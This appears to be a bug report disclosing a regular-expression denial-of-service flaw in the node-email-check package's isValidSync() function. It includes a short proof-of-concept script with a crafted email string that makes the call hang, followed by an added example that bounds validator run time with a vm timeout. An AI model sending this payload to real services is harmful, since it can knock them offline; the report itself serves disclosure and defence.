Describe the bug
A clear and concise description of what the bug is.
The regex on line 10 is vulnerable to regex denial of service when provided with malicious input.
To Reproduce
I tested it on the isValidSync() function by feeding it a malformed input. The program hangs for an indefinite amount of time when provided with this input. Here is the source code.
```js
const emailCheck = require('node-email-check');

// Start the timer that console.timeEnd() below reports on
console.time('[ + ] Time passed -> ');
// payload
var chck = emailCheck.isValidSync('-@[IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"');
//var chck = emailCheck.isValidSync('validemail@example.com');
console.log(chck);
console.timeEnd('[ + ] Time passed -> ');
```
Expected behavior
Usually these kinds of attacks return with a small difference in time, but this time the function hangs. This bug leads to denial of service.
Additional context
Add any other context about the problem here.
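One way for a caller to keep a synchronous validator such as `isValidSync()` from blocking the process until the regex itself is fixed, as an added example (not code from this issue or from node-email-check): Node's `vm` timeout aborts the call once a time budget is spent. `callWithBudget`, `isValidBounded`, `standInIsValidSync` and its regex are hypothetical stand-ins constructed for the illustration.

```javascript
// Added example: bound the CPU time of a synchronous validator call.
const vm = require('node:vm');

// The script only invokes the wrapped function; the timeout is applied
// by the vm watchdog, which also interrupts regex backtracking.
const script = new vm.Script('result = run()');

// Run fn(...args) and abort it if it is still executing after `ms` ms.
function callWithBudget(fn, args, ms) {
  const sandbox = { run: () => fn(...args), result: undefined };
  try {
    script.runInNewContext(sandbox, { timeout: ms });
    return { timedOut: false, value: sandbox.result };
  } catch (err) {
    if (err && err.code === 'ERR_SCRIPT_EXECUTION_TIMEOUT') {
      return { timedOut: true, value: undefined };
    }
    throw err; // unrelated errors still reach the caller
  }
}

// Constructed stand-in for a vulnerable validator. The nested quantifier
// backtracks exponentially; this is NOT node-email-check's regex.
const SLOW_RE = /^([a-z0-9]+)+@example\.com$/;
function standInIsValidSync(email) {
  return SLOW_RE.test(email);
}

// Fail closed: an input that exhausts the budget is treated as invalid,
// and the timeout is reported so it can be logged or rate-limited.
function isValidBounded(email, ms = 250) {
  const r = callWithBudget(standInIsValidSync, [email], ms);
  return { valid: r.timedOut ? false : r.value === true, timedOut: r.timedOut };
}

// Constructed input that makes the stand-in regex run far past any budget.
const CONSTRUCTED_SLOW_INPUT = 'a'.repeat(48) + '!';

console.log(isValidBounded('alice42@example.com'));
console.log(isValidBounded(CONSTRUCTED_SLOW_INPUT));
```

The budget limits the damage per call but still spends that much CPU on each hostile input, so it complements a fix to the pattern rather than replacing one.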